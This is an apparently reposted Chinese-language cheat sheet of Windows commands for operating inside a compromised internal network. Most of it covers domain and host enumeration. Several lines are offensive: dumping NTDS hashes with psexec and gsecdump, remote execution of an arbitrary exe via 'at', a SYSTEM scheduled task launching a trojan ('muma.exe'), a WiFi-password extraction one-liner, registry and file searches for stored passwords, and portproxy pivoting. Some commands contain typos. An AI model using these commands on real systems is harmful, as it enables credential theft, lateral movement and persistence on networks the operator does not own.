內網命令記錄

域常用操作命令:

net group /domain //獲得所有域用戶組列表
net group qq_group /domain //顯示域中qq_group組的成員
net group qq_group /del /domain //刪除域中qq_group組
net group qq_group qq /del /domain //刪除域內qq_group 羣組中的成員QQ
net group qq_group /add /domain //增加域中的羣組
net group “domain admins” /domain //獲得域管理員列表
net group “enterprise admins” /domain //獲得企業管理員列表
net localgroup administrators /domain //獲取域內置administrators組用(enterprise admins、domain admins)
net group “domain controllers” /domain //獲得域控制器列表
net group “domain computers” /domain //獲得所有域成員計算機列表
net user /domain //獲得所有域用戶列表
net user someuser /domain //獲得指定賬戶someuser的詳細信息
net accounts /domain //獲得域密碼策略設置,密碼長短,錯誤鎖定等信息
nei view /domain //查詢有幾個域, 查詢域列表
net view /domain:testdomain //查看 testdomain域中的計算機列表
nltest /domain_trusts //獲取域信任信息
net user domain-admin /domain //查看管理員登陸時間,密碼過期時間,是否有登陸腳本,組分配等信息
net config Workstation //查詢機器屬於哪個域
net time /domian //查詢主域服務器的時間
echo %logonserver% //查看登陸到這臺服務器的計算機名
net time \192.168.1.1 //查詢遠程共享主機192.168.1.1的時間
net use \IP\ipc$ password /user:username@domain //ipc$域內連接
net view \tdcoming.com\ //查看域控共享情況
dir \tdcoming.com\SYSVOL /s /a > sysvol.txt //列出sysvol日誌記錄
xcopy \tdcoming.com\sysvol.txt sysvol.txt /i /e /c //遠程拷貝到本地sysvol日誌
net user /domain bk bk123 //修改域內用戶密碼,需要管理員權限
net localgroup administartors SEZKL\backlion /add //將SEZKL域中的用戶backlion添加到administrators組中
mstsc /admin //遠程桌面登錄到console會話解決hash無法抓出問題
gpupdate/force //更新域策略
psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u //從域服務器密碼存儲文件windows/ntds/ntds.dit導出hash值出來
gsecdump -a //獲取域登管理員登錄過得hash值,這裏gescdump爲第三方導出AD域的hash值
tasklist /S ip /U domain\username /P /V //查看遠程計算機進程列

基本內網命令:

ipconfig/all //查看IP地址
ipconfig /release //釋放地址
ipconfig /renew 重新獲取Ip地址
whoami //查詢賬號所屬權限
whoami/all //查看sid值
systeminfo //查詢系統以及補丁信息
tasklist /svc //查看進程
taskkill /im 進程名稱(cmd) //結束進程
taskkill /pid[進程碼] -t(結束該進程) -f(強制結束該進程以及所有子進程)
wmic qfe get hotfixid //查看已安裝過得補丁,這個很實用
wmic qfe list full /format:htable > hotfixes.htm //詳細的補丁安裝
wmic qfe //查詢補丁信息以及微軟提供的下載地址
ping hostname(主機名) //顯示該機器名的IP
net start //查看當前運行的服務
net user //查看本地組的用戶
net localhroup administrators //查看本機管理員組有哪些用戶
net user //查看會話
net session //查看當前會話
net share //查看SMB指向的路徑[即共享]
wmic share get name,path //查看SMB指向的路徑
wmic nteventlog get path,filename,writeable //查詢系統日誌文件存儲位置
net use \IP\ipc$ password /user:username //建立IPC會話(工作組模式)
net use z: \192.168.1.1 //建立映射到本機Z盤
net time \172.16.16.2 //查詢共享主機的是
at \172.16.16.2 13:50 c:\windows\2009.exe //在共享主機上執行
netstat -ano //查看開放的端口
netstat -an | find “3389” //找到3389端口
net accounts //查看本地密碼策略
nbtstat –A ip //netbiso查詢
net view //查看機器註釋或許能得到當前活動狀態的機器列表,如果禁用netbios就查看不出來
echo %PROCESSOR_ARCHITECTURE% //查看系統是32還是64位
set //查看系統環境設置變量
net start //查看當前運行的服務
wmic service list brief //查看進程服務
wmic process list brief //查看進程
wmic startup list brief //查看啓動程序信息
wmic product list brief //查看安裝程序和版本信息(漏洞利用線索)
wmic startup list full //識別開機啓動的程序
wmic process where(description=“mysqld.exe”) >>mysql.log //獲取軟件安裝路徑
for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan showprofiles’) do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear //一鍵獲取wifi密碼
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) //查看是否支持posershellqwinsta //查看登錄情況
schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR “c:/muma.ex e” /ED 2019/1/1
REG query HKCU /v “pwd” /s //獲取保存到註冊表中的密碼

內網網絡常用命令:

tracert IP //路由跟蹤
route print //打印路由表
arp -a //列出本網段內所有活躍的IP地址
arp -s (ip + mac) //綁定mac與ip地址
arp -d (ip + mac) //解綁mac與ip地址
nbtscan -r 192.168.16.0/24 //通過小工具nbtscan掃描整個網絡
netsh firewall show config //查看防火牆策略
netsh firewall show state //查看防火牆策略
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl" //批量掃描內網存活主機

windows自帶端口轉發

netsh interface ipv6 install //首先安裝IPV6(xp、2003下IPV6必須安裝,否則端口轉發不可用!)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22 //將本機22到1.1.1.1的22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22
netsh interface portproxy show all // 查看轉發配置
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22 //刪除配置
netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all //添加防火牆規則,允許連接22:

敏感數據和目錄

dir /b/s config.* //查看所在目錄所有config.爲前綴的文件
findstr /si password *.xml *.ini *.txt //查看後綴名文件中含有password關鍵字的文件
findstr /si login *.xml *.ini *.txt //查看後綴名文件中含有login關鍵字的文件
copy con 創建命令:
copy con ftp.bat //創建ftp.bat批處理,然後輸入ifconfig等命令,按ctr+z退出,並創建成功
copy con test.vbs //創建test.vbs腳本,輸入腳本後,按ctr+z退出,並創建成功

dsquery的AD查詢工具

dsquery user domainroot -limit 65535 && net user /domain //列出該域內所有用戶名
dsquery server -domain super.com | dsget server -dnsname -site //搜索域內所有域控制器並顯示他們的DNS主機名和站點名稱
dsquery contact //尋找目錄中的聯繫人
dsquery subnet //列出該域內網段劃分
query user //查詢那些用戶在線
dsquery group && net group /domain //列出該域內分組
dsquery ou //列出該域內組織單位
dsquery server && net time /domain //列出該域內域控制器
dsquery site -o rdn //搜索域中所有站點的名稱
dsquery group dc=super,dc=com |more //搜索在DC=SUPER,DC=COM 域中的所有組
psloggedon.exe //查詢那臺主機和用戶登錄到該主機上
netsess.exe //192.168.1.115 //遠程主機上無需管理員權限,查詢到主機名和用戶
reg query “HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT” //獲取最近mstsc登錄的記錄

DOS常用快捷命令

mspaint 畫圖工具
calc 計算器
notepad 記事本
taskmgr 任務管理器
osk 打開屏幕鍵盤
gpedit.msc 組策略
services.msc 本地服務
compmgmt.msc 計算機管理
devmgmt.msc 設備管理器
winver 查看系統版本
magnify 放大鏡實用程序
eventvwr 事件查看器
Regedit 打開註冊表
resmon 資源監視器
WMIC BIOS get releasedate 查看電腦生產日期
mstsc -f 遠程連接(可以全屏)

原文鏈接:
https://mp.weixin.qq.com/s/HTiGjKAoqCvNjB0zfZSQqg

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章